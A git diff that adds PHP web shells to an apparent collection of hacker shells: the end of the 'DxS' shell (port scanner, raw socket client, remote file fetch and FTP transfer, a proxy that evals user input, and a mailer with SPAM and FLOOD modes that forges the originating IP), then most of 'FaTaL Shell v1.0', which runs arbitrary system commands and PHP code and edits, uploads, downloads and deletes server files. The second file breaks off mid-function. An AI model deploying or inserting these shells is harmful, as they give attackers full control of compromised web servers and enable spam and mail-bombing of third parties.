+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0>'
+		.'<tr>'
+			.'<td colspan=2>'
+			.'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>'
+			.'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>'
+		.'</tr><tr>'
+			.'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>'
+			.'</td><td>'
+				.'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>'
+				.'<br><input type=submit value="Scan" class="submit" style="width:100pt;">'
+		.'</tr></table></form>';
+	}
+
+########
+########   Raw s0cket
+########
+if ($_GET['dxmode']=='SOCK')
+	{
+	$DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val'));
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">';
+	print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>'
+			.' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=3>'
+			.'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>'
+			.'</td></tr>';
+	print "\n".'<tr>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='HTML')?'CHECKED':'')	:'CHECKED') ).'>HTML</td>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>'
+		.'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>'
+		.'</tr>';
+	print "\n".'</table>';
+
+	if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die();
+
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>';
+	print "\n\n\n".'<tr><td class=listing>';
+
+	$fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']);
+	if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr));
+
+	if ($_POST['dxsock_type']=='TEXT') print '<plaintext>';
+
+	if (!empty($_POST['dxsock_request']))	fputs($fp, $_POST['dxsock_request']);
+	$ret='';
+	while (!feof($fp)) $ret.=fgets($fp, 4096 );
+	fclose( $fp );
+
+	if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE;
+
+	if ($headers_over_place===FALSE)	print $ret;
+		else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place);
+
+	if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>';
+	}
+
+########
+########   FTP, HTTP file transfers
+########
+if ($_GET['dxmode']=='FTP')
+	{	print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>';
+
+	print "\n".'<tr><td>'; /* HTTP GET */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">';
+	print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP DOWNL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP UPL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td></tr></table>';
+
+	if (isset($_POST['DxFTP_HTTP']))		{		$URLPARSED=parse_url($_POST['DxFTP_HTTP']);		$request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']);
+		if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr));
+		fputs($f, $request);
+
+		$GETFILE='';
+		while (!feof($f)) $GETFILE.=fgets($f, 4096 );
+		fclose( $f );
+
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE);
+		}
+
+	if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL']))
+		{		$DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']);
+		if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];}
+		if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection'));
+		if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed'));
+		if (isset($_POST['DxFTP_UPL']))
+			if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to upload'));  else print 'Upload OK';
+		if (isset($_POST['DxFTP_DWN']))
+			if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to download')); else print 'Download OK';
+		ftp_close($FTP);
+		}
+	}
+
+########
+########   HTTP Proxy
+########
+if ($_GET['dxmode']=='PROX')
+	{
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0>';
+	print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">'
+				.' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">';
+	print "\n".'</td></tr></table></form>';
+
+	if (!isset($_POST['DxProx_Url'])) die();
+
+	print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n";
+
+	if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array();
+		else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();}
+	if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array();
+		else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();}
+
+	$URLPARSED=parse_url($_POST['DxProx_Url']);
+	$request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']);
+	if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10)))
+		die(DxError('Sock #'.$errno.' : '.$errstr));
+	fputs($f, $request);
+
+	$RET='';
+	while (!feof($f)) $RET.=fgets($f, 4096 );
+	fclose( $f );
+
+	print "\n".'<table width=100% border=0><tr><td>';
+	$headers_over_place=strpos($RET,"\r\n\r\n");
+	if ($headers_over_place===FALSE)	print $RET;
+		else
+		print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place);
+	print str_repeat("\n", 10).'</td></tr></table>';
+	}
+
+########
+########   MAIL
+########
+if ($_GET['dxmode']=='MAIL')
+	{	if (!isset($_GET['dxparam']))
+		{
+		print '';		print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">'
+			.'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>'
+			.'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">';
+		print "\n".'</form>';
+		die();}
+
+	if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')');
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>';
+	if ($_GET['dxparam']=='FLOOD')
+		{		print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO']  ).'"></td></tr>';
+		print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.(  (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM']  ).'" SIZE=10></td></tr>';
+		}
+		else		print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.(  (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM']  ).'>" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.(  (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ']  ).'"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.(  (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>';
+	print "\n".'</td></table></form>';
+
+	if (!isset($_POST['DxMailer_TO'])) die();
+
+	$HEADERS='';
+	$HEADERS.= 'MIME-Version: 1.0'."\r\n";
+	$HEADERS.= 'Content-type: text/html;'."\r\n";
+	$HEADERS.='To: %%TO%%'."\r\n";
+	$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n";
+	$HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n";
+	$HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n";
+	$HEADERS.='Message-Id: <%%ID%%>';
+
+	if ($_GET['dxparam']=='FLOOD')
+		{		$NUM=$_POST['DxMailer_NUM'];
+		$MAILS=array($_POST['DxMailer_TO']);
+		}
+		else
+		{		$MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO']));
+		$NUM=1;
+		}
+
+	function DxMail($t, $s, $m, $h)   /* debugger */
+	{print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;}
+
+	$RESULTS[]=array();
+
+	for ($n=0;$n<$NUM;$n++)
+	for ($m=0;$m<count($MAILS);$m++)		$RESULTS[]=(int)
+		mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'],
+			str_replace(array('%%TO%%','%%IP%%', '%%ID%%'),
+						array('<'.$MAILS[$m].'>'  ,  long2ip(mt_rand(0,pow(2,31)))  ,  md5($n.$m.DxRandomChars(3).time())),
+						$HEADERS)
+			);
+
+	print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.(		(100*array_sum($RESULTS))/($NUM*(count($MAILS)))		).'% okay)';
+
+	}
+
+if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>';
+die();
+?>
+
diff --git a/xakep-shells/PHP/Fatalshell.php.php.txt b/xakep-shells/PHP/Fatalshell.php.php.txt
new file mode 100644
index 0000000..c43d10d
--- /dev/null
+++ b/xakep-shells/PHP/Fatalshell.php.php.txt
@@ -0,0 +1,283 @@
+<?php
+session_start();
+error_reporting(E_ALL ^ E_NOTICE);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
+@ini_set('max_execution_time',0);
+(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)");
+
+(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
+(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
+$version='version 1.0 by FaTaLErrOr';
+$action=$_POST['action'];
+$file=$_POST['file'];
+$dir=$_POST['dir'];
+$content='';
+$stdata='';
+$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - FaTaL Shell v1.0</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1254">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+
+$lang=array(
+'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.',
+'uploadok'=>'Ba�ar�yla Y�klendi.',
+'dircrt'=>'Klas�r Olu�turuldu.',
+'dontlist'=>'Listelenemiyor �zin Yok.',
+'dircrterr'=>'Olu�turulam�yor �zin Yok.',
+'dirnf'=>'Dizin Bulunamadi.',
+'filenf'=>'.',
+'dontwrdir'=>'Sadece Okunabilir.',
+'empty'=>'Dizin Bo� De�il Yada �zin Yok.',
+'deletefileok'=>'Dosya Silindi.',
+'deletedirok'=>'Klas�r Silindi.',
+'isdontfile'=>'L�tfen Full Url Yaz�n. c:/program files/a.php Gibi',
+'cantrfile'=>'Dosya A��lam�yor izin Yok.',
+'onlyracc'=>'Dosya Editlenemiyor Okuma �zni Var Sadece..',
+'workdir'=>'�al��ma Dizini: ',
+'fullacc'=>'Full Yetki.',
+'fullaccdir'=>'Full Yetkiniz Var Dosya Silip D�zenleyebilirsiniz.',
+'thisnodir'=>'Klas�r Se�in.',
+'allfuncsh'=>'Fonksiyo�nlar Kapal�.'
+);
+
+$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions
+
+function test_file($file){
+if(!file_exists($file))$err="1";
+elseif(!is_file($file)) $err="2";
+elseif(!is_readable($file))$err="3";
+elseif(!is_writable($file))$err="4"; else $err="5";
+return $err;}
+
+function test_dir($dir){
+if(!file_exists($dir))$err="1";
+elseif(!is_dir($dir)) $err="2";
+elseif(!is_readable($dir))$err="3";
+elseif(!is_writable($dir))$err="4"; else $err="5";
+return $err;}
+
+function perms($file){ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;} 
+
+function view_size($size){
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;}
+
+if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
+
+if(isset($dir)){
+  $ts['test']=test_dir($dir); 
+  switch($ts['test']){
+    case 1:$stdata.=$lang['dirnf'];break;
+    case 2:$stdata.=$lang['thisnodir'];break;
+    case 3:$stdata.=$lang['dontlist'];break;
+    case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
+    case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
+}else $dir=@chdir($dir);
+
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+if(isset($file)){
+    $ts['test1']=test_file($file);
+  switch ($ts['test1']){
+    case 1:$stdata.=$lang['filenf'];break;
+	case 2:$stdata.=$lang['isdontfile'];break;
+	case 3:$stdata.=$lang['cantrfile'];break;
+	case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
+	case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
+}
+
+function shell($cmd)
+{
+  global $lang;
+ $ret = '';
+ if (!empty($cmd))
+ {
+  if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
+  elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
+  elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
+  else $ret=$lang['allfuncsh'];
+ }
+ return $ret;
+}
+
+function createdir($dir){mkdir($dir);}
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya D�nemk ��in T�klay�n�z.</a>";
+}
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya D�nemk ��in T�klay�n�z.</a>";
+else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya D�nemk ��in T�klay�n�z.</a>";
+}
+//shell
+if($action=="shell"){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
+<input type=\"submit\" value=\"Uygula\"></form>";}
+//editor  
+if($action=="editor"){
+  $stdata.="<form method=POST>
+  <input type=\"hidden\" name=\"action\" value=\"editor\">
+  <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+  Dosyan�n Ad� (Full Url Yaz�n)<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\"Editle\"></form>";	  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+}
+  function readf($file){
+  clearstatcache();
+  $f=fopen($file, "r");
+  $contents = fread($f,filesize($file));
+  fclose($f);
+  return htmlspecialchars($contents);
+}
+if(@$_POST['save'])writef($file,$_POST['data']);
+if(@$_POST['create'])writef($file,"");
+$test=test_file($file);
+if($test==1){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
+<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
+<input type=\"reset\" value=\"No\"></form>";
+}
+if($test>2){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"Kaydet\"><input type=\"reset\" value=\"Reset\"></form>";
+}}
+//viewer
+if($action=="viewer"){
+$content.="<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+$content.="<tr><td><form method=POST>Klasore Git:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"Git\"></form></td></tr>";
+  if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		if ($GLOBALS['os']==1) {
+		  $content.="<tr><td>HDD Secin:";
+		  for ($j=ord('C'); $j<=ord('Z'); $j++) 
+		   if (@$dh = opendir(chr($j).":/"))
+		   $content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+		   $content.="</td></tr>";
+		 }
+		$content.="<tr><td>Sistem: ".@php_uname()."</td></tr><tr><td></td><td>Bi�im</td><td>Boyut</td><td>izin</td><td>Se�enekler</td></tr>";
+		for($i=0;$i<count($dire);$i++) {
+		  $link=$dir.$dire[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Klasor</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Klas�r� Sil">X</a></td></tr>';  
+		}
+		for($i=0;$i<count($files);$i++) {
+		  $linkfile=$dir.$files[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>Dosya</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Bu Dosyayi Sil">X</a></td></tr>'; 
+		}
+		$content.="</table>";
+}}}
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);}
+//phpeval
+if($action=="phpeval"){
+$content.="<form method=\"POST\">
+ <input type=\"hidden\" name=\"action\" value=\"phpeval\">
+ <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+ &lt;?php<br>
+ <textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
+ ?><br>
+ <input type=\"submit\" value=\"Uygula\"></form>";
+if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
+//upload
+if($action=="upload"){
+  if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="<tr><td><form method=POST enctype=multipart/form-data>
+  <input type=\"hidden\" name=\"action\" value=\"upload\">  
+  Buraya Uploadla:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>Dosyay� Adland�r (Gerekli) :<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload Et'></td></tr>";
+  if($os==1)$content.=$form_win;
+  if($os==0){
